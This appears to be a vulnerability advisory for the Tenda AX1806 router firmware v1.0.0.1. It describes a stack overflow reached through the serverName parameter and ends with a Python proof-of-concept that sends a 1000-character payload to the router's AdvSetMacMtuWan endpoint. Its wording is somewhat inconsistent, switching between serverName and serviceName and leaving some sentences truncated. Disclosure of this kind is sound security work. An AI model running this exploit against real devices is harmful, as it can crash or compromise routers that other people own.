Tenda AX1806 v1.0.0.1 contains a stack overflow via the serverName parameter in the function form_fast_setting_internet_set.
The form_fast_setting_internet_set function in Tenda AX1806 v1.0.0.1 first extracts the value of the netWanType parameter from the POST request, and then passes this value to the sub_30930 function as the third parameter. By controlling the content of the POST request, we set the value of the netWanType parameter to 2, which is then passed as the third parameter to the sub_30930 function.
sub_30930 function, the sprintf function is utilized to concatenate the wan1.connecttype string. Subsequently, the SetValue function is employed to assign the value of the environment variable wan1.connecttype to the third parameter a3 passed into the sub_30930 function, with a value of 2.
moves to the fromAdvSetMacMtuWan function. Here, the value "2" obtained from the POST request for the environment variable string wan1.connecttype is passed to v6, triggering the execution of the sub_65A64 function.
value of the serviceName parameter is extracted from the POST request, and then passed to the strcpy function, resulting in a buffer overflow.
import requests
url = "<http://192.168.188.157/goform/SetIPTVCfg>"
data = {
"netWanType": 2,
"adslUser": "aaaa",
"adslPwd": "aaaa"
}
response = requests.post(url, data=data)
url = "<http://192.168.188.157/goform/AdvSetMacMtuWan>"
payload = "a"*1000
data = {
"wanMTU": 1285,
"wanSpeed": 0,
"cloneType": 0,
"mac": "00:00:00:00:00:01",
"serverName": payload
}
response = requests.post(url, data=data)
print(response.text)
Tenda AX1806 v1.0.0.1 contains a stack overflow via the serverName parameter in the function form_fast_setting_internet_set.